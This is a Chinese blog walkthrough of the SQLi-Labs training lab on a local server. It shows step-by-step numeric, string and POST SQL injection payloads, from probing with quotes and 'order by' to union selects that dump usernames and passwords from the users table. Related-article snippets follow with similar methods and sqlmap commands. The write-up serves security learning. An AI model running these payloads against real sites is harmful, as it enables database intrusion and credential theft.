sql-labs数字型、字符型注入

最新推荐文章于 2024-06-28 20:41:31 发布
最新推荐文章于 2024-06-28 20:41:31 发布
阅读量3.7k 收藏 7
点赞数 2
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63510587/article/details/122970311
版权

访问SQLi-Labs网站

一、数字型注入

1、访问less-2

访问后根据提示先给定一个GET参数

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1

此时页面显示id=1的用户名和密码
在这里插入图片描述

2、寻找注入点、判断注入类型

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ >> 运行后报错

在这里插入图片描述

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=1 >> 运行后正常显示

在这里插入图片描述

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 >>运行后未正常显示

在这里插入图片描述

由以上可以判断,存在数字型注入

3、判断网站查询的列数

尝试使用 order by
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 1–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 2–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 3–+ >>正常显示
在这里插入图片描述
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 order by 4–+ >>报错
在这里插入图片描述
由以上可以判断,网站查询字段数为3

4、判断网站回显位

利用union select 判断
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,3–+
在这里插入图片描述
可以看到2号和3号可以回显
后面,可以再2号或3号位设置一些具有特殊功能的函数或命令来执行sql注入

5、获取网站所在数据库名

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,database()–+
在这里插入图片描述

6、获取数据库security的全部表名

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
在这里插入图片描述
7、获取users表的全部列名
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+
在这里插入图片描述
8、获取users表id、username和password的值
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(’~’,id,username,password) from security.users limit 0,1–+
在这里插入图片描述
由于users表中存放着多组数据,我们可以通过limit M,N 的方式逐条显示

二、字符型注入

1、访问 less-1

http://127.0.0.1/bc/sqli-labs/Less-1/
在这里插入图片描述

2、寻找注入点

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ >>运行报错
在这里插入图片描述
http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and ‘1’=‘1 >>运行后正常显示
在这里插入图片描述
http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and ‘1’='2 >>运行后未正常显示
在这里插入图片描述
由此可以判断存在字符型注入

3、判断网站列数

http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ order by 1–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1‘ order by 2–+ >>正常显示
http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ order by 3–+ >>正常显示
在这里插入图片描述
http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ order by 4–+ >>报错
在这里插入图片描述网站查询字段数为3

4、判断网站回显位

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,3–+
在这里插入图片描述
2号3号可以回显

5、获取当前所在数据库名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,database()–+
在这里插入图片描述

6、获取数据库security的全部表名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+
在这里插入图片描述

7、获取users表的全部列名

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+
在这里插入图片描述

8、获取users表id、username和password列的全部值

http://127.0.0.1/bc/sqli-labs/Less-1/?id=1’ and 1=2 union select 1,2,concat_ws(’~’,id,username,password)from security.users limit 0,1 --+
在这里插入图片描述

三、POST注入

1、访问less-11

http://127.0.0.1/bc/sqli-labs/Less-11/
在这里插入图片描述

2、利用burp suite工具抓包

在浏览器访问less-11登录界面,输入用户名admin,密码任意,点击submit按钮
在这里插入图片描述
将获取的数据包发送到repeater选项卡下
在这里插入图片描述

3、寻找注入点

在POST表单处,使用payload判断
uname=amdin’&passwd=123&submit=Submit >>报错
在这里插入图片描述
uname=admin’#&passwd=123&submit=Submit 回显正常用户名和密码
在这里插入图片描述

4、判断列数

uname=admin’order by 1#&passwd=123&submit=Submit
uname=admin’order by 2#&passwd=123&submit=Submit
正常回显
在这里插入图片描述
uname=admin’order by 3#&passwd=123&submit=Submit
报错
在这里插入图片描述
可以判断,网站查询字段数为2

5、判断网站回显位置

uname=admin’and 1=2 union select 1,2#&passwd=123&submit=Submit
在这里插入图片描述
1号和2号都能回显

6、获取网站当前所在数据库名

uname=admin’and 1=2 union select 1,database()#&passwd=123&submit=Submit
在这里插入图片描述

7、获取数据库security的全部表名

uname=admin’and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’#&passwd=123&submit=Submit
在这里插入图片描述

8、获取users表的全部列名

uname=admin’and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#&passwd=123&submit=Submit
在这里插入图片描述

9、获取users表id、username和password列的所有值

uname=admin’and 1=2 union select 1,concat_ws(’~’,id,username,password) from security.users limit 0,1#&passwd=123&submit=Submit
在这里插入图片描述

_七点半
关注
理论篇8:SQL注入(字符注入数字型注入)
aiojay的博客
05-02 3602
SQL注入(字符注入数字型注入),Mysql中 int(3) 类的含义,判断MYSQL注入闭合方式:
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 860
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入:是数值还是字符,通过测试可知less1为字符注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库。
如何判断是字符注入还是整形注入
欢迎光临
11-25 6981
1、数字型注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; (2) 加and 1=1 ,URL:www.text.com/tex...
数字型字符注入
最新发布
My笔记的博客
06-28 423
上面的查询过程有一个username表,数据库会先把所有数据都取出来,第一步里面取出来了两个数据分别是amdin和guest接着,把我们要查询的字符和数据库里面的字符进行对比,先用admin 和 传入的 admin进行对比,结果是为真,接着是拿guest 和 admin 进行对比,结果为假,那么返回的只有 admin 这一行的数据。服务器返回了数据库内所有的数据,因为我们上的语句用了or那么意味着,不管我输入的账号对不对,因为1=1所以服务器匹配到的数据都为真,那么就输出了所有的数据。
SQL注入数字型注入 & 字符注入
07-12 2317
SQL-数字&字符
sql注入字符数字型
qq_75005708的博客
04-08 2599
id=1%' and 1=1--+/#和?id=1%' and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。id=1' and 1=1--+/#和?id=1' and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
SQL注入字符数字型注入原理及注入步骤(sqli-labs-master 1-2关)
qiqi_w的博客
11-27 6317
SQL注入字符数字型注入原理及注入步骤 sqli-labs-master 1-2关演示截图
Sql-labs 第一关超详细讲解
A9874564的博客
02-21 6107
一.Sql注入含义 所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器使其解析并执行的一种攻击手法。 二.注入思路 1.判断是否存在注入注入字符还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三.判断是否存在注入点 ...
sql-labs 1-10关 含多种解法 包括sqlmap py脚本
07-23
- **数字型SQL注入**:与字符注入不同,数字型注入通常不包含引号,因此测试时应直接使用数字或表达式,如`?id=1+1`。 - **测试方法**:尝试在参数中插入数字和算术表达式来触发错误或异常行为。 - **利用技巧**:...
数字型字符及搜索和XXSQL注入
weixin_44721672的博客
03-24 663
一,数字型: 先随机选一个选项 点击查询 得到上图 然后YY是否可以进行注入 打开pikachu数据 输入show tables 进行检验 在输入desc member 再输入下图代码 遍历数据库 由于1or1永远为真 所以会将数据库内容全部显示 打开bp进行抓包 为操作方便 先关闭拦截 使用HTTP history进行查找 先随便选择一个选项 点击查询 然后在bp中找到 发送到r...
SQL注入分类,一看你就明白了。SQL注入点_SQL注入_SQL注入有几种_SQL注入点分类
Spontaneous_0的博客
12-28 1070
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
SQL注入---数字型注入字符注入
Y4tacker的博客
07-23 9874
文章目录SQLMAP注入手动注入 SQLMAP注入 ①判断注入sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” 发现是一个注入点 ②查询数据库 sqlmap.py -u “http://challenge-7fac72c17bef7f22.sandbox.ctfhub.com:10080/?id=1” --current-db 得到当前数据库sqli ③查询数据表(flag与news) ④
数字型字符SQL注入对比
m0_58231750的博客
03-15 897
通常SQL 注入漏洞分类:按照数据类数字型字符、搜索注入按照请求方式:GET注、POST注、HEADER注入按照注入点位置:列注入、表注入、order注入、limit注、group by注入……示例:数字型注入:id=1 +xx+ --+字符注入:uname=admin' +xx+ --+搜索注入:keyword=admin%' +xx+ --+数据库中区别数字型:id =x and 1=1。
网站SQL注入数字型注入字符注入
04-30 1080
什么是SQL注入- (SQL Injection)是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库漏洞进行攻击。1,是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击2,这些参数传递给后台的SQL数据库服务器加以解析并执行 SQL注入分类-- 按数据类分类,1,分为 整形注入注入 (不需要闭合,大多数不需要注释符号)2,字符串类注入 (...
字符注入
haodawei123的博客
01-17 1732
字符注入的特点是网站链接末尾不是id=11这样的,而是字符如 http://www.xycj.gov.cn/cks/kw.asp?action=gh 注入点 字母 http://www.zgcforum.org/forum.asp?title=会议议程 注入点中文 测试代码 : ‘+and+’1’=‘1 返回正常 ‘+and+’1’='2 返回错误 ...
MySQL联合注入数字型注入
m0_50211409的博客
03-26 610
SQL注入原理 SQL注入攻击是网站未对sql语句,完全校验通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。一切与数据库存在交互的地方都是有可能存在注入漏洞的。 这难度程度是比较简单的,但是需要一些SQL语句基础。 测试环境:东塔靶场 https://labs.do-ta.com/index/course/detail/id/51 测试工具:hackebay 1.判断是否存在注入 我们可以在url的id=1后添加一个单引号(‘)执行,看语句是否会带入查询 如
***学习笔记--基础篇--sql注入数字型
weixin_34364071的博客
09-28 607
环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium一、分析和查找注入点(1)知识点回顾如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的payload(有效载荷)的话,则我们必须先闭合前面的单引号或者双引号,否则我们的数据始终会被...
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号的字符联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值